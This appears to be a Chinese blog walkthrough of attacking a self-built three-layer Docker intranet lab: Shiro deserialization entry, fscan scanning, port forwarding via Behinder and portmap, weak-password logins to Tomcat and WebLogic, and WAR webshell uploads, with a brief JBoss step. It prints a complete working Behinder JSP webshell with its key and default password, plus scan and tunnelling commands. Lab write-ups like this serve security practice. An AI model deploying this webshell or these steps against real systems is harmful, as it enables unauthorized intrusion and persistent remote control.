上一篇 写了用一个 Docker 搭建了一个多层内网环境的靶场
靶场环境:https://github.com/yanshu-smile/CFS-Docker

这次来试着打一下,顺便复现一下常见Java Web服务的漏洞,尝试一下别的工具来完成内网渗透的过程
请添加图片描述

入口

首先入口是shiro 反序列化 ,用工具shiro_attack 一把梭

请添加图片描述

注入 冰蝎内存马,用冰蝎连接webshell进行管理

请添加图片描述

环境变量中 看到 flag

请添加图片描述

第一层

使用fscan 对内网服务进行扫描

./fs -h 172.16.238.10/24 -np -o res.txt

请添加图片描述

试着使用一下 冰蝎自带的内网穿透功能 , 将内网的tomcat8 服务转发

请添加图片描述

公网服务器上开启 用 portmap 开启监听,将内网的端口映射到 8002 上

./portmap -m 2 -p1 8000 -h2 47.99.120.46 -p2 8002

请添加图片描述
请添加图片描述

fscan 扫描有 tomcat8 弱密码漏洞 ,burp suite 爆破弱密码 tomcat/tomcat 登录后台

参考链接:
https://blog.csdn.net/weixin_41598660/article/details/107443373

请添加图片描述

将冰歇马打包成zip 改名为war ,后台上传 war 包

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

请添加图片描述

冰蝎连接 /shell/shell.jsp , 冰歇马 默认密码 rebeyond ,可以在环境变量看到第二个flag

请添加图片描述

第二层

查看第二层内网的网段,用fscan进行扫描 ,10.10.5.88 的 7001 端口 是一个weblogic 服务,同样用冰蝎转发出来,用portmap 监听端口接收

 ./portmap -m 2 -p1 8005 -h2 47.99.120.46 -p2 8006

Weblogic后台地址为:

http://ip:7001/console/login/LoginForm.jsp
输入http://ip:7001/console会自动跳转至后台

请添加图片描述

爆破弱密码 weblogic/Oracle@123 ,上传 冰蝎马war包 getshell

请添加图片描述

冰蝎连上webshell之后 ,看到flag

请添加图片描述

第三层

查看网卡信息 ,获取到最后一层内网地址 ,内网 172.42.66.77:8080 是一个jboss 6.x (最后代理掉了,用本地环境写复现过程)

请添加图片描述

JbossScan 扫描出有可能存在的漏洞,网上都有相应的POC可以试试

请添加图片描述

用工具可以直接执行命令,或者反弹shell
请添加图片描述

如果靶机不出网,也可以尝试弱口令 爆破后台部署webshell,目前这靶机没有发现常规的弱密码
请添加图片描述

总结

CFS-Docker 构建的漏洞环境还是比较常规的,大家根据不同漏洞环境的Docker,可以加入一些PHP、Linux提权的环境来构建这个内网靶场,但总体来说还是有些许局限性,比如我还没在compose中找到限制靶机出网的配置

文章中使用的一些工具和方法也有点麻烦,大家可以多尝试各种方法,欢迎多交流

Logo

权威|前沿|技术|干货|国内首个API全生命周期开发者社区

更多推荐